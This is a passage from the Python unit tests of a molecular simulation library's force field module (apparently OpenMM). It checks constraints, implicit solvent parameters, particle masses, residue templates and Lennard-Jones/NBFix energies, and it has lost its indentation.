topology = self.pdb1.topology
for constraints_value in [None, HBonds, AllBonds, HAngles]:
for rigidWater_value in [True, False, None]:
system = self.forcefield1.createSystem(topology,
constraints=constraints_value,
rigidWater=rigidWater_value)
validateConstraints(self, topology, system,
constraints_value, rigidWater_value != False)
def test_flexibleConstraints(self):
""" Test the flexibleConstraints keyword """
topology = self.pdb1.topology
system1 = self.forcefield1.createSystem(topology, constraints=HAngles,
rigidWater=True)
system2 = self.forcefield1.createSystem(topology, constraints=HAngles,
rigidWater=True, flexibleConstraints=True)
system3 = self.forcefield1.createSystem(topology, constraints=None, rigidWater=False)
validateConstraints(self, topology, system1, HAngles, True)
# validateConstraints fails for system2 since by definition atom pairs can be in both bond
# and constraint lists. So just check that the number of constraints is the same for both
# system1 and system2
self.assertEqual(system1.getNumConstraints(), system2.getNumConstraints())
for force in system1.getForces():
if isinstance(force, HarmonicBondForce):
bf1 = force
elif isinstance(force, HarmonicAngleForce):
af1 = force
for force in system2.getForces():
if isinstance(force, HarmonicBondForce):
bf2 = force
elif isinstance(force, HarmonicAngleForce):
af2 = force
for force in system3.getForces():
if isinstance(force, HarmonicAngleForce):
af3 = force
# Make sure we picked up extra bond terms with flexibleConstraints
self.assertGreater(bf2.getNumBonds(), bf1.getNumBonds())
# Make sure flexibleConstraints yields just as many angles as no constraints
self.assertEqual(af2.getNumAngles(), af3.getNumAngles())
def test_ImplicitSolvent(self):
"""Test the four types of implicit solvents using the implicitSolvent
parameter.
"""
topology = self.pdb2.topology
system = self.forcefield2.createSystem(topology)
forces = system.getForces()
self.assertTrue(any(isinstance(f, GBSAOBCForce) for f in forces))
def test_ImplicitSolventParameters(self):
"""Test that solventDielectric and soluteDielectric are passed correctly
for the different types of implicit solvent.
"""
topology = self.pdb2.topology
system = self.forcefield2.createSystem(topology, solventDielectric=50.0,
soluteDielectric=0.9)
found_matching_solvent_dielectric=False
found_matching_solute_dielectric=False
for force in system.getForces():
if isinstance(force, GBSAOBCForce):
if force.getSolventDielectric() == 50.0:
found_matching_solvent_dielectric = True
if force.getSoluteDielectric() == 0.9:
found_matching_solute_dielectric = True
if isinstance(force, NonbondedForce):
self.assertEqual(force.getReactionFieldDielectric(), 1.0)
self.assertTrue(found_matching_solvent_dielectric and
found_matching_solute_dielectric)
def test_HydrogenMass(self):
"""Test that altering the mass of hydrogens works correctly."""
topology = self.pdb1.topology
hydrogenMass = 4*amu
system1 = self.forcefield1.createSystem(topology)
system2 = self.forcefield1.createSystem(topology, hydrogenMass=hydrogenMass)
for atom in topology.atoms():
if atom.element == elem.hydrogen:
self.assertNotEqual(hydrogenMass, system1.getParticleMass(atom.index))
if atom.residue.name == 'HOH':
self.assertEqual(system1.getParticleMass(atom.index), system2.getParticleMass(atom.index))
else:
self.assertEqual(hydrogenMass, system2.getParticleMass(atom.index))
totalMass1 = sum([system1.getParticleMass(i) for i in range(system1.getNumParticles())]).value_in_unit(amu)
totalMass2 = sum([system2.getParticleMass(i) for i in range(system2.getNumParticles())]).value_in_unit(amu)
self.assertAlmostEqual(totalMass1, totalMass2)
def test_DrudeMass(self):
"""Test that setting the mass of Drude particles works correctly."""
forcefield = ForceField('charmm_polar_2013.xml')
pdb = PDBFile('systems/ala_ala_ala.pdb')
modeller = Modeller(pdb.topology, pdb.positions)
modeller.addExtraParticles(forcefield)
system = forcefield.createSystem(modeller.topology, drudeMass=0)
trueMass = [system.getParticleMass(i) for i in range(system.getNumParticles())]
drudeMass = 0.3*amu
system = forcefield.createSystem(modeller.topology, drudeMass=drudeMass)
adjustedMass = [system.getParticleMass(i) for i in range(system.getNumParticles())]
drudeForce = [f for f in system.getForces() if isinstance(f, DrudeForce)][0]
drudeParticles = set()
parentParticles = set()
for i in range(drudeForce.getNumParticles()):
params = drudeForce.getParticleParameters(i)
drudeParticles.add(params[0])
parentParticles.add(params[1])
for i in range(system.getNumParticles()):
if i in drudeParticles:
self.assertEqual(0*amu, trueMass[i])
self.assertEqual(drudeMass, adjustedMass[i])
elif i in parentParticles:
self.assertEqual(trueMass[i]-drudeMass, adjustedMass[i])
else:
self.assertEqual(trueMass[i], adjustedMass[i])
def test_UnusedArgs(self):
"""Test that specifying an argument that is never used throws an exception."""
topology = self.pdb1.topology
# Using the default value should not raise an exception.
self.forcefield1.createSystem(topology, drudeMass=0.4*amu)
# Specifying a non-default value should.
with self.assertRaises(ValueError):
self.forcefield1.createSystem(topology, drudeMass=0.5*amu)
# Specifying a nonexistant argument should raise an exception.
with self.assertRaises(ValueError):
self.forcefield1.createSystem(topology, nonbndedCutoff=1.0*nanometer)
def test_Forces(self):
"""Compute forces and compare them to ones generated with a previous version of OpenMM to ensure they haven't changed."""
pdb = PDBFile('systems/lysozyme-implicit.pdb')
system = self.forcefield2.createSystem(pdb.topology)
integrator = VerletIntegrator(0.001)
context = Context(system, integrator)
context.setPositions(pdb.positions)
state1 = context.getState(getForces=True)
with open('systems/lysozyme-implicit-forces.xml') as input:
state2 = XmlSerializer.deserialize(input.read())
numDifferences = 0
for f1, f2, in zip(state1.getForces().value_in_unit(kilojoules_per_mole/nanometer), state2.getForces().value_in_unit(kilojoules_per_mole/nanometer)):
diff = norm(f1-f2)
if diff > 0.1 and diff/norm(f1) > 1e-3:
numDifferences += 1
self.assertTrue(numDifferences < system.getNumParticles()/20) # Tolerate occasional differences from numerical error
def test_ImplicitSolventForces(self):
"""Compute forces for different implicit solvent types, and compare them to ones generated with AmberPrmtopFile."""
solventType = ['hct', 'obc1', 'obc2', 'gbn', 'gbn2']
nonbondedMethod = [NoCutoff, CutoffNonPeriodic, CutoffNonPeriodic, NoCutoff, NoCutoff]
kappa = [0.0, 0.0, 1.698295227342757, 1.698295227342757, 0.0]
file = [None, 'OBC1_NonPeriodic', 'OBC2_NonPeriodic_Salt', None, 'GBn2_NoCutoff']
for i in range(len(file)):
forcefield = ForceField('amber96.xml', f'implicit/{solventType[i]}.xml')
system = forcefield.createSystem(self.pdb2.topology, nonbondedMethod=nonbondedMethod[i], implicitSolventKappa=kappa[i])
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatformByName("Reference"))
context.setPositions(self.pdb2.positions)
state1 = context.getState(getForces=True)
if file[i] is not None:
with open('systems/alanine-dipeptide-implicit-forces/'+file[i]+'.xml') as infile:
state2 = XmlSerializer.deserialize(infile.read())
for f1, f2, in zip(state1.getForces().value_in_unit(kilojoules_per_mole/nanometer), state2.getForces().value_in_unit(kilojoules_per_mole/nanometer)):
diff = norm(f1-f2)
self.assertTrue(diff < 0.1 or diff/norm(f1) < 1e-4)
def test_ProgrammaticForceField(self):
"""Test building a ForceField programmatically."""
# Build the ForceField for TIP3P programmatically.
ff = ForceField()
ff.registerAtomType({'name':'tip3p-O', 'class':'OW', 'mass':15.99943*daltons, 'element':elem.oxygen})
ff.registerAtomType({'name':'tip3p-H', 'class':'HW', 'mass':1.007947*daltons, 'element':elem.hydrogen})
residue = ForceField._TemplateData('HOH')
residue.atoms.append(ForceField._TemplateAtomData('O', 'tip3p-O', elem.oxygen))
residue.atoms.append(ForceField._TemplateAtomData('H1', 'tip3p-H', elem.hydrogen))
residue.atoms.append(ForceField._TemplateAtomData('H2', 'tip3p-H', elem.hydrogen))
residue.addBond(0, 1)
residue.addBond(0, 2)
ff.registerResidueTemplate(residue)
bonds = forcefield.HarmonicBondGenerator(ff)
bonds.registerBond({'class1':'OW', 'class2':'HW', 'length':0.09572*nanometers, 'k':462750.4*kilojoules_per_mole/nanometer})
ff.registerGenerator(bonds)
angles = forcefield.HarmonicAngleGenerator(ff)
angles.registerAngle({'class1':'HW', 'class2':'OW', 'class3':'HW', 'angle':1.82421813418*radians, 'k':836.8*kilojoules_per_mole/radian})
ff.registerGenerator(angles)
nonbonded = forcefield.NonbondedGenerator(ff, 0.833333, 0.5, True)
nonbonded.registerAtom({'type':'tip3p-O', 'charge':-0.834, 'sigma':0.31507524065751241*nanometers, 'epsilon':0.635968*kilojoules_per_mole})
nonbonded.registerAtom({'type':'tip3p-H', 'charge':0.417, 'sigma':1*nanometers, 'epsilon':0*kilojoules_per_mole})
ff.registerGenerator(nonbonded)
# Build a water box.
modeller = Modeller(Topology(), [])
modeller.addSolvent(ff, boxSize=Vec3(3, 3, 3)*nanometers)
# Create a system using the programmatic force field as well as one from an XML file.
system1 = ff.createSystem(modeller.topology)
ff2 = ForceField('tip3p.xml')
system2 = ff2.createSystem(modeller.topology)
self.assertEqual(XmlSerializer.serialize(system1), XmlSerializer.serialize(system2))
def test_PeriodicBoxVectors(self):
"""Test setting the periodic box vectors."""
vectors = (Vec3(5, 0, 0), Vec3(-1.5, 4.5, 0), Vec3(0.4, 0.8, 7.5))*nanometers
self.pdb1.topology.setPeriodicBoxVectors(vectors)
self.assertEqual(Vec3(5, 4.5, 7.5)*nanometers, self.pdb1.topology.getUnitCellDimensions())
system = self.forcefield1.createSystem(self.pdb1.topology)
for i in range(3):
self.assertEqual(vectors[i], self.pdb1.topology.getPeriodicBoxVectors()[i])
self.assertEqual(vectors[i], system.getDefaultPeriodicBoxVectors()[i])
def test_ResidueAttributes(self):
"""Test a ForceField that gets per-particle parameters from residue attributes."""
xml = """
<ForceField>
<AtomTypes>
<Type name="tip3p-O" class="OW" element="O" mass="15.99943"/>
<Type name="tip3p-H" class="HW" element="H" mass="1.007947"/>
</AtomTypes>
<Residues>
<Residue name="HOH">
<Atom name="O" type="tip3p-O" charge="-0.834"/>
<Atom name="H1" type="tip3p-H" charge="0.417"/>
<Atom name="H2" type="tip3p-H" charge="0.417"/>
<Bond from="0" to="1"/>
<Bond from="0" to="2"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="tip3p-O" sigma="0.315" epsilon="0.635"/>
<Atom type="tip3p-H" sigma="1" epsilon="0"/>
</NonbondedForce>
</ForceField>"""
ff = ForceField(StringIO(xml))
# Build a water box.
modeller = Modeller(Topology(), [])
modeller.addSolvent(ff, boxSize=Vec3(3, 3, 3)*nanometers)
# Create a system and make sure all nonbonded parameters are correct.
system = ff.createSystem(modeller.topology)
nonbonded = [f for f in system.getForces() if isinstance(f, NonbondedForce)][0]
atoms = list(modeller.topology.atoms())
for i in range(len(atoms)):
params = nonbonded.getParticleParameters(i)
if atoms[i].element == elem.oxygen:
self.assertEqual(params[0], -0.834*elementary_charge)
self.assertEqual(params[1], 0.315*nanometers)
self.assertEqual(params[2], 0.635*kilojoule_per_mole)
else:
self.assertEqual(params[0], 0.417*elementary_charge)
self.assertEqual(params[1], 1.0*nanometers)
self.assertEqual(params[2], 0.0*kilojoule_per_mole)
def test_residueMatcher(self):
"""Test using a custom template matcher to select templates."""
xml = """
<ForceField>
<AtomTypes>
<Type name="tip3p-O" class="OW" element="O" mass="15.99943"/>
<Type name="tip3p-H" class="HW" element="H" mass="1.007947"/>
</AtomTypes>
<Residues>
<Residue name="HOH">
<Atom name="O" type="tip3p-O" charge="-0.834"/>
<Atom name="H1" type="tip3p-H" charge="0.417"/>
<Atom name="H2" type="tip3p-H" charge="0.417"/>
<Bond from="0" to="1"/>
<Bond from="0" to="2"/>
<Bond from="1" to="2"/>
</Residue>
<Residue name="HOH2">
<Atom name="O" type="tip3p-O" charge="0.834"/>
<Atom name="H1" type="tip3p-H" charge="-0.417"/>
<Atom name="H2" type="tip3p-H" charge="-0.417"/>
<Bond from="0" to="1"/>
<Bond from="0" to="2"/>
<Bond from="1" to="2"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="tip3p-O" sigma="0.315" epsilon="0.635"/>
<Atom type="tip3p-H" sigma="1" epsilon="0"/>
</NonbondedForce>
</ForceField>"""
ff = ForceField(StringIO(xml))
# Load a water box.
prmtop = AmberPrmtopFile('systems/water-box-216.prmtop')
top = prmtop.topology
# Building a System should fail, because two templates match each residue.
self.assertRaises(Exception, lambda: ff.createSystem(top))
# Register a template matcher that selects a particular one.
def matcher(ff, res, bondedToAtom, ignoreExternalBonds, ignoreExtraParticles):
return ff._templates['HOH2']
ff.registerTemplateMatcher(matcher)
# It should now succeed in building a System.
system = ff.createSystem(top)
# Make sure it used the correct parameters.
nb = [f for f in system.getForces() if isinstance(f, NonbondedForce)][0]
for atom in top.atoms():
charge, sigma, epsilon = nb.getParticleParameters(atom.index)
if atom.name == 'O':
self.assertEqual(0.834*elementary_charge, charge)
else:
self.assertEqual(-0.417*elementary_charge, charge)
def test_residueTemplateGenerator(self):
"""Test the ability to add residue template generators to parameterize unmatched residues."""
def simpleTemplateGenerator(forcefield, residue):
"""\
Simple residue template generator.
This implementation uses the programmatic API to define residue templates.
NOTE: We presume we have already loaded the force definitions into ForceField.
"""
# Generate a unique prefix name for generating parameters.
from uuid import uuid4
template_name = uuid4()
# Create residue template.
from openmm.app.forcefield import _createResidueTemplate
template = _createResidueTemplate(residue) # use helper function
template.name = template_name # replace template name
for (template_atom, residue_atom) in zip(template.atoms, residue.atoms()):
template_atom.type = 'XXX' # replace atom type
# Register the template.
forcefield.registerResidueTemplate(template)
# Signal that we have successfully parameterized the residue.
return True
# Define forcefield parameters used by simpleTemplateGenerator.
# NOTE: This parameter definition file will currently only work for residues that either have
# no external bonds or external bonds to other residues parameterized by the simpleTemplateGenerator.
simple_ffxml_contents = """
<ForceField>
<AtomTypes>
<Type name="XXX" class="XXX" element="C" mass="12.0"/>
</AtomTypes>
<HarmonicBondForce>
<Bond type1="XXX" type2="XXX" length="0.1409" k="392459.2"/>
</HarmonicBondForce>
<HarmonicAngleForce>
<Angle type1="XXX" type2="XXX" type3="XXX" angle="2.09439510239" k="527.184"/>
</HarmonicAngleForce>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
<Atom type="XXX" charge="0.000" sigma="0.315" epsilon="0.635"/>
</NonbondedForce>
</ForceField>"""
#
# Test where we generate parameters for only a ligand.
#
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'T4-lysozyme-L99A-p-xylene-implicit.pdb'))
# Create a ForceField object.
forcefield = ForceField('amber99sb.xml', 'tip3p.xml', StringIO(simple_ffxml_contents))
# Add the residue template generator.
forcefield.registerTemplateGenerator(simpleTemplateGenerator)
# Parameterize system.
system = forcefield.createSystem(pdb.topology, nonbondedMethod=NoCutoff)
# TODO: Test energies are finite?
#
# Test for a few systems where we generate all parameters.
#
tests = [
{ 'pdb_filename' : 'alanine-dipeptide-implicit.pdb', 'nonbondedMethod' : NoCutoff },
{ 'pdb_filename' : 'lysozyme-implicit.pdb', 'nonbondedMethod' : NoCutoff },
{ 'pdb_filename' : 'alanine-dipeptide-explicit.pdb', 'nonbondedMethod' : CutoffPeriodic },
]
# Test all systems with separate ForceField objects.
for test in tests:
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', test['pdb_filename']))
# Create a ForceField object.
forcefield = ForceField(StringIO(simple_ffxml_contents))
# Add the residue template generator.
forcefield.registerTemplateGenerator(simpleTemplateGenerator)
# Parameterize system.
system = forcefield.createSystem(pdb.topology, nonbondedMethod=test['nonbondedMethod'])
# TODO: Test energies are finite?
# Now test all systems with a single ForceField object.
# Create a ForceField object.
forcefield = ForceField(StringIO(simple_ffxml_contents))
# Add the residue template generator.
forcefield.registerTemplateGenerator(simpleTemplateGenerator)
for test in tests:
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', test['pdb_filename']))
# Parameterize system.
system = forcefield.createSystem(pdb.topology, nonbondedMethod=test['nonbondedMethod'])
# TODO: Test energies are finite?
def test_getUnmatchedResidues(self):
"""Test retrieval of list of residues for which no templates are available."""
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'T4-lysozyme-L99A-p-xylene-implicit.pdb'))
# Create a ForceField object.
forcefield = ForceField('amber99sb.xml', 'tip3p.xml')
# Get list of unmatched residues.
unmatched_residues = forcefield.getUnmatchedResidues(pdb.topology)
# Check results.
self.assertEqual(len(unmatched_residues), 1)
self.assertEqual(unmatched_residues[0].name, 'TMP')
self.assertEqual(unmatched_residues[0].id, '163')
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'ala_ala_ala.pdb'))
# Create a ForceField object.
forcefield = ForceField('tip3p.xml')
# Get list of unmatched residues.
unmatched_residues = forcefield.getUnmatchedResidues(pdb.topology)
# Check results.
self.assertEqual(len(unmatched_residues), 3)
self.assertEqual(unmatched_residues[0].name, 'ALA')
self.assertEqual(unmatched_residues[0].chain.id, 'X')
self.assertEqual(unmatched_residues[0].id, '1')
def test_generateTemplatesForUnmatchedResidues(self):
"""Test generation of blank forcefield residue templates for unmatched residues."""
#
# Test where we generate parameters for only a ligand.
#
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'nacl-water.pdb'))
# Create a ForceField object.
forcefield = ForceField('tip3p.xml')
# Get list of unmatched residues.
unmatched_residues = forcefield.getUnmatchedResidues(pdb.topology)
[templates, residues] = forcefield.generateTemplatesForUnmatchedResidues(pdb.topology)
# Check results.
self.assertEqual(len(unmatched_residues), 24)
self.assertEqual(len(residues), 2)
self.assertEqual(len(templates), 2)
unique_names = set([ residue.name for residue in residues ])
self.assertTrue('HOH' not in unique_names)
self.assertTrue('NA' in unique_names)
self.assertTrue('CL' in unique_names)
template_names = set([ template.name for template in templates ])
self.assertTrue('HOH' not in template_names)
self.assertTrue('NA' in template_names)
self.assertTrue('CL' in template_names)
# Define forcefield parameters using returned templates.
# NOTE: This parameter definition file will currently only work for residues that either have
# no external bonds or external bonds to other residues parameterized by the simpleTemplateGenerator.
simple_ffxml_contents = """
<ForceField>
<AtomTypes>
<Type name="XXX" class="XXX" element="C" mass="12.0"/>
</AtomTypes>
<HarmonicBondForce>
<Bond type1="XXX" type2="XXX" length="0.1409" k="392459.2"/>
</HarmonicBondForce>
<HarmonicAngleForce>
<Angle type1="XXX" type2="XXX" type3="XXX" angle="2.09439510239" k="527.184"/>
</HarmonicAngleForce>
<NonbondedForce coulomb14scale="0.833333" lj14scale="0.5">
<Atom type="XXX" charge="0.000" sigma="0.315" epsilon="0.635"/>
</NonbondedForce>
</ForceField>"""
#
# Test the pre-geenration of missing residue template for a ligand.
#
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'T4-lysozyme-L99A-p-xylene-implicit.pdb'))
# Create a ForceField object.
forcefield = ForceField('amber99sb.xml', 'tip3p.xml', StringIO(simple_ffxml_contents))
# Get list of unique unmatched residues.
[templates, residues] = forcefield.generateTemplatesForUnmatchedResidues(pdb.topology)
# Add residue templates to forcefield.
for template in templates:
# Replace atom types.
for atom in template.atoms:
atom.type = 'XXX'
# Register the template.
forcefield.registerResidueTemplate(template)
# Parameterize system.
system = forcefield.createSystem(pdb.topology, nonbondedMethod=NoCutoff)
# TODO: Test energies are finite?
def test_getMatchingTemplates(self):
"""Test retrieval of list of templates that match residues in a topology."""
# Load the PDB file.
pdb = PDBFile(os.path.join('systems', 'ala_ala_ala.pdb'))
# Create a ForceField object.
forcefield = ForceField('amber99sb.xml')
# Get list of matching residue templates.
templates = forcefield.getMatchingTemplates(pdb.topology)
# Check results.
residues = [ residue for residue in pdb.topology.residues() ]
self.assertEqual(len(templates), len(residues))
self.assertEqual(templates[0].name, 'NALA')
self.assertEqual(templates[1].name, 'ALA')
self.assertEqual(templates[2].name, 'CALA')
def test_Wildcard(self):
"""Test that PeriodicTorsionForces using wildcard ('') for atom types / classes in the ffxml are correctly registered"""
# Use wildcards in types
xml = """
<ForceField>
<AtomTypes>
<Type name="C" class="C" element="C" mass="12.010000"/>
<Type name="O" class="O" element="O" mass="16.000000"/>
</AtomTypes>
<PeriodicTorsionForce>
<Proper type1="" type2="C" type3="C" type4="" periodicity1="2" phase1="3.141593" k1="15.167000"/>
<Improper type1="C" type2="" type3="" type4="O" periodicity1="2" phase1="3.141593" k1="43.932000"/>
</PeriodicTorsionForce>
</ForceField>"""
ff = ForceField(StringIO(xml))
self.assertEqual(len(ff._forces[0].proper), 1)
self.assertEqual(len(ff._forces[0].improper), 1)
# Use wildcards in classes
xml = """
<ForceField>
<AtomTypes>
<Type name="C" class="C" element="C" mass="12.010000"/>
<Type name="O" class="O" element="O" mass="16.000000"/>
</AtomTypes>
<PeriodicTorsionForce>
<Proper class1="" class2="C" class3="C" class4="" periodicity1="2" phase1="3.141593" k1="15.167000"/>
<Improper class1="C" class2="" class3="" class4="O" periodicity1="2" phase1="3.141593" k1="43.932000"/>
</PeriodicTorsionForce>
</ForceField>"""
ff = ForceField(StringIO(xml))
self.assertEqual(len(ff._forces[0].proper), 1)
self.assertEqual(len(ff._forces[0].improper), 1)
def test_ScalingFactorCombining(self):
""" Tests that FFs can be combined if their scaling factors are very close """
forcefield = ForceField('amber99sb.xml', os.path.join('systems', 'test_amber_ff.xml'))
# This would raise an exception if it didn't work
def test_MultipleFilesandForceTags(self):
"""Test that the order of listing of multiple ffxmls does not matter.
Tests that one generator per force type is created and that the ffxml
defining atom types does not have to be listed first"""
ffxml = """<ForceField>
<Residues>
<Residue name="ACE-Test">
<Atom name="HH31" type="710"/>
<Atom name="CH3" type="711"/>
<Atom name="HH32" type="710"/>
<Atom name="HH33" type="710"/>
<Atom name="C" type="712"/>
<Atom name="O" type="713"/>
<Bond from="0" to="1"/>
<Bond from="1" to="2"/>
<Bond from="1" to="3"/>
<Bond from="1" to="4"/>
<Bond from="4" to="5"/>
<ExternalBond from="4"/>
</Residue>
</Residues>
<PeriodicTorsionForce>
<Proper class1="C" class2="C" class3="C" class4="C" periodicity1="2" phase1="3.14159265359" k1="10.46"/>
<Improper class1="C" class2="C" class3="C" class4="C" periodicity1="2" phase1="3.14159265359" k1="43.932"/>
</PeriodicTorsionForce>
</ForceField>"""
ff1 = ForceField(StringIO(ffxml), 'amber99sbildn.xml')
ff2 = ForceField('amber99sbildn.xml', StringIO(ffxml))
self.assertEqual(len(ff1._forces), 4)
self.assertEqual(len(ff2._forces), 4)
pertorsion1 = ff1._forces[0]
pertorsion2 = ff2._forces[2]
self.assertEqual(len(pertorsion1.proper), 110)
self.assertEqual(len(pertorsion1.improper), 42)
self.assertEqual(len(pertorsion2.proper), 110)
self.assertEqual(len(pertorsion2.improper), 42)
def test_ResidueTemplateUserChoice(self):
"""Test createSystem does not allow multiple matching templates, unless
user has specified which template to use via residueTemplates arg"""
ffxml = """<ForceField>
<AtomTypes>
<Type name="Fe2+" class="Fe2+" element="Fe" mass="55.85"/>
<Type name="Fe3+" class="Fe3+" element="Fe" mass="55.85"/>
</AtomTypes>
<Residues>
<Residue name="FE2">
<Atom name="FE2" type="Fe2+" charge="2.0"/>
</Residue>
<Residue name="FE">
<Atom name="FE" type="Fe3+" charge="3.0"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333333333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="Fe2+" sigma="0.227535532613" epsilon="0.0150312292"/>
<Atom type="Fe3+" sigma="0.192790482606" epsilon="0.00046095128"/>
</NonbondedForce>
</ForceField>"""
pdb_string = "ATOM 1 FE FE A 1 20.956 27.448 -29.067 1.00 0.00 Fe"
ff = ForceField(StringIO(ffxml))
pdb = PDBFile(StringIO(pdb_string))
self.assertRaises(Exception, lambda: ff.createSystem(pdb.topology))
sys = ff.createSystem(pdb.topology, residueTemplates={list(pdb.topology.residues())[0] : 'FE2'})
# confirm charge
self.assertEqual(sys.getForce(0).getParticleParameters(0)[0]._value, 2.0)
sys = ff.createSystem(pdb.topology, residueTemplates={list(pdb.topology.residues())[0] : 'FE'})
# confirm charge
self.assertEqual(sys.getForce(0).getParticleParameters(0)[0]._value, 3.0)
def test_ResidueOverriding(self):
"""Test residue overriding via override tag in the XML"""
ffxml1 = """<ForceField>
<AtomTypes>
<Type name="Fe2+_tip3p_HFE" class="Fe2+_tip3p_HFE" element="Fe" mass="55.85"/>
</AtomTypes>
<Residues>
<Residue name="FE2">
<Atom name="FE2" type="Fe2+_tip3p_HFE" charge="2.0"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333333333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="Fe2+_tip3p_HFE" sigma="0.227535532613" epsilon="0.0150312292"/>
</NonbondedForce>
</ForceField>"""
ffxml2 = """<ForceField>
<AtomTypes>
<Type name="Fe2+_tip3p_standard" class="Fe2+_tip3p_standard" element="Fe" mass="55.85"/>
</AtomTypes>
<Residues>
<Residue name="FE2">
<Atom name="FE2" type="Fe2+_tip3p_standard" charge="2.0"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333333333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="Fe2+_tip3p_standard" sigma="0.241077193129" epsilon="0.03940482832"/>
</NonbondedForce>
</ForceField>"""
ffxml3 = """<ForceField>
<AtomTypes>
<Type name="Fe2+_tip3p_standard" class="Fe2+_tip3p_standard" element="Fe" mass="55.85"/>
</AtomTypes>
<Residues>
<Residue name="FE2" override="1">
<Atom name="FE2" type="Fe2+_tip3p_standard" charge="2.0"/>
</Residue>
</Residues>
<NonbondedForce coulomb14scale="0.833333333333" lj14scale="0.5">
<UseAttributeFromResidue name="charge"/>
<Atom type="Fe2+_tip3p_standard" sigma="0.241077193129" epsilon="0.03940482832"/>
</NonbondedForce>
</ForceField>"""
pdb_string = "ATOM 1 FE FE A 1 20.956 27.448 -29.067 1.00 0.00 Fe"
pdb = PDBFile(StringIO(pdb_string))
self.assertRaises(Exception, lambda: ForceField(StringIO(ffxml1), StringIO(ffxml2)))
ff = ForceField(StringIO(ffxml1), StringIO(ffxml3))
self.assertEqual(ff._templates['FE2'].atoms[0].type, 'Fe2+_tip3p_standard')
ff.createSystem(pdb.topology)
def test_LennardJonesGenerator(self):
""" Test the LennardJones generator"""
warnings.filterwarnings('ignore', category=CharmmPSFWarning)
psf = CharmmPsfFile('systems/ions.psf')
pdb = PDBFile('systems/ions.pdb')
params = CharmmParameterSet('systems/toppar_water_ions.str'
)
# Box dimensions (found from bounding box)
psf.setBox(12.009*angstroms, 12.338*angstroms, 11.510*angstroms)
# Turn off charges so we only test the Lennard-Jones energies
for a in psf.atom_list:
a.charge = 0.0
# Now compute the full energy
plat = Platform.getPlatformByName('Reference')
system = psf.createSystem(params, nonbondedMethod=PME,
nonbondedCutoff=5*angstroms)
con = Context(system, VerletIntegrator(2*femtoseconds), plat)
con.setPositions(pdb.positions)
# Now set up system from ffxml.
xml = """
<ForceField>
<AtomTypes>
<Type name="SOD" class="SOD" element="Na" mass="22.98977"/>
<Type name="CLA" class="CLA" element="Cl" mass="35.45"/>
</AtomTypes>
<Residues>
<Residue name="CLA">
<Atom name="CLA" type="CLA"/>
</Residue>
<Residue name="SOD">
<Atom name="SOD" type="SOD"/>
</Residue>
</Residues>
<LennardJonesForce lj14scale="1.0" useDispersionCorrection="False">
<Atom type="CLA" sigma="0.404468018036" epsilon="0.6276"/>
<Atom type="SOD" sigma="0.251367073323" epsilon="0.1962296"/>
<NBFixPair type1="CLA" type2="SOD" sigma="0.33239431" epsilon="0.350933"/>
</LennardJonesForce>
</ForceField> """
ff = ForceField(StringIO(xml))
system2 = ff.createSystem(pdb.topology, nonbondedMethod=PME,
nonbondedCutoff=5*angstroms)
con2 = Context(system2, VerletIntegrator(2*femtoseconds), plat)
con2.setPositions(pdb.positions)
state = con.getState(getEnergy=True, enforcePeriodicBox=True)
ene = state.getPotentialEnergy().value_in_unit(kilocalories_per_mole)
state2 = con2.getState(getEnergy=True, enforcePeriodicBox=True)
ene2 = state2.getPotentialEnergy().value_in_unit(kilocalories_per_mole)
self.assertAlmostEqual(ene, ene2)
def test_NBFix(self):
"""Test using LennardJonesGenerator to implement NBFix terms."""
# Create a chain of five atoms.
top = Topology()
chain = top.addChain()
res = top.addResidue('RES', chain)
top.addAtom('A', elem.oxygen, res)
top.addAtom('B', elem.carbon, res)
top.addAtom('C', elem.carbon, res)
top.addAtom('D', elem.carbon, res)
top.addAtom('E', elem.nitrogen, res)
atoms = list(top.atoms())
top.addBond(atoms[0], atoms[1])
top.addBond(atoms[1], atoms[2])
top.addBond(atoms[2], atoms[3])
top.addBond(atoms[3], atoms[4])
# Create the force field and system.
xml = """
<ForceField>
<AtomTypes>
<Type name="A" class="A" element="O" mass="1"/>
<Type name="B" class="B" element="C" mass="1"/>
<Type name="C" class="C" element="C" mass="1"/>
<Type name="D" class="D" element="C" mass="1"/>
<Type name="E" class="E" element="N" mass="1"/>
</AtomTypes>
<Residues>
<Residue name="RES">
<Atom name="A" type="A"/>
<Atom name="B" type="B"/>
<Atom name="C" type="C"/>
<Atom name="D" type="D"/>
<Atom name="E" type="E"/>
<Bond atomName1="A" atomName2="B"/>
<Bond atomName1="B" atomName2="C"/>
<Bond atomName1="C" atomName2="D"/>
<Bond atomName1="D" atomName2="E"/>
</Residue>
</Residues>
<LennardJonesForce lj14scale="0.3">
<Atom type="A" sigma="1" epsilon="0.1"/>
<Atom type="B" sigma="2" epsilon="0.2"/>
<Atom type="C" sigma="3" epsilon="0.3"/>
<Atom type="D" sigma="4" epsilon="0.4"/>
<Atom type="E" sigma="4" epsilon="0.4"/>
<NBFixPair type1="A" type2="D" sigma="2.5" epsilon="1.1"/>
<NBFixPair type1="A" type2="E" sigma="3.5" epsilon="1.5"/>
</LennardJonesForce>
</ForceField> """
ff = ForceField(StringIO(xml))
system = ff.createSystem(top)
# Check that it produces the correct energy.
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatform(0))
positions = [Vec3(i, 0, 0) for i in range(5)]*nanometers
context.setPositions(positions)
def ljEnergy(sigma, epsilon, r):
return 4*epsilon*((sigma/r)**12-(sigma/r)**6)
